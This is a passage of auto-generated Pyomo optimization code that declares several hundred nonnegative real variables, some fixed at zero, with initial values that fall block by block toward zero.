m.x500 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x501 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x502 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x503 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x504 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x505 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x506 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x507 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x508 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x509 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x510 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x511 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x512 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x513 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x514 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x515 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x516 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x517 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x518 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x519 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x520 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x521 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x522 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x523 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x524 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x525 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x526 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x527 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x528 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x529 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x530 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x531 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x532 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x533 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x534 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x535 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x536 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x537 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x538 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x539 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x540 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x541 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x542 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x543 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x544 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x545 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x546 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x547 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x548 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x549 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x550 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x551 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x552 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x553 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x554 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x555 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x556 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x557 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x558 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x559 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x560 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x561 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x562 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x563 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x564 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x565 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x566 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x567 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x568 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x569 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x570 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x571 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x572 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x573 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x574 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x575 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x576 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x577 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x578 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x579 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x580 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x581 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x582 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x583 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x584 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x585 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x586 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x587 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x588 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x589 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x590 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x591 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x592 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x593 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x594 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x595 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x596 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x597 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x598 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x599 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x600 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x601 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x602 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x603 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x604 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x605 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x606 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x607 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x608 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x609 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x610 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x611 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x612 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x613 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x614 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x615 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x616 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x617 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x618 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x619 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x620 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x621 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x622 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x623 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x624 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x625 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x626 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x627 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x628 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x629 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x630 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x631 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x632 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x633 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x634 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x635 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x636 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x637 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x638 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x639 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x640 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x641 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x642 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x643 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x644 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x645 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x646 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x647 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x648 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x649 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x650 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x651 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x652 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x653 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x654 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x655 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x656 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x657 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x658 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x659 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x660 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x661 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x662 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x663 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x664 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x665 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x666 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x667 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x668 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x669 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x670 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x671 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x672 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x673 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x674 = Var(within=Reals,bounds=(0,None),initialize=0.183749517816564)
m.x675 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x676 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x677 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x678 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x679 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x680 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x681 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x682 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x683 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x684 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x685 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x686 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x687 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x688 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x689 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x690 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x691 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x692 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x693 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x694 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x695 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x696 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x697 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x698 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x699 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x700 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x701 = Var(within=Reals,bounds=(0,None),initialize=0.0615609061339361)
m.x702 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x703 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x704 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x705 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x706 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x707 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x708 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x709 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x710 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x711 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x712 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x713 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x714 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x715 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x716 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x717 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x718 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x719 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x720 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x721 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x722 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x723 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x724 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x725 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x726 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x727 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x728 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x729 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x730 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x731 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x732 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x733 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x734 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x735 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x736 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x737 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x738 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x739 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x740 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x741 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x742 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x743 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x744 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x745 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x746 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x747 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x748 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x749 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x750 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x751 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x752 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x753 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x754 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x755 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x756 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x757 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x758 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x759 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x760 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x761 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x762 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x763 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x764 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x765 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x766 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x767 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x768 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x769 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x770 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x771 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x772 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x773 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x774 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x775 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x776 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x777 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x778 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x779 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x780 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x781 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x782 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x783 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x784 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x785 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x786 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x787 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x788 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x789 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x790 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x791 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x792 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x793 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x794 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x795 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x796 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x797 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x798 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x799 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x800 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x801 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x802 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x803 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x804 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x805 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x806 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x807 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x808 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x809 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x810 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x811 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x812 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x813 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x814 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x815 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x816 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x817 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x818 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x819 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x820 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x821 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x822 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x823 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x824 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x825 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x826 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x827 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x828 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x829 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x830 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x831 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x832 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x833 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x834 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x835 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x836 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x837 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x838 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x839 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x840 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x841 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x842 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x843 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x844 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x845 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x846 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x847 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x848 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x849 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x850 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x851 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x852 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x853 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x854 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x855 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x856 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x857 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x858 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x859 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x860 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x861 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x862 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x863 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x864 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x865 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x866 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x867 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x868 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x869 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x870 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x871 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x872 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x873 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x874 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x875 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x876 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x877 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x878 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x879 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x880 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x881 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x882 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x883 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x884 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x885 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x886 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x887 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x888 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x889 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x890 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x891 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x892 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x893 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x894 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x895 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x896 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x897 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x898 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x899 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x900 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x901 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x902 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x903 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x904 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x905 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x906 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x907 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x908 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x909 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x910 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x911 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x912 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x913 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x914 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x915 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x916 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x917 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x918 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x919 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x920 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x921 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x922 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x923 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x924 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x925 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x926 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x927 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x928 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x929 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x930 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x931 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x932 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x933 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x934 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x935 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x936 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x937 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x938 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x939 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x940 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x941 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x942 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x943 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x944 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x945 = Var(within=Reals,bounds=(0,0),initialize=0)
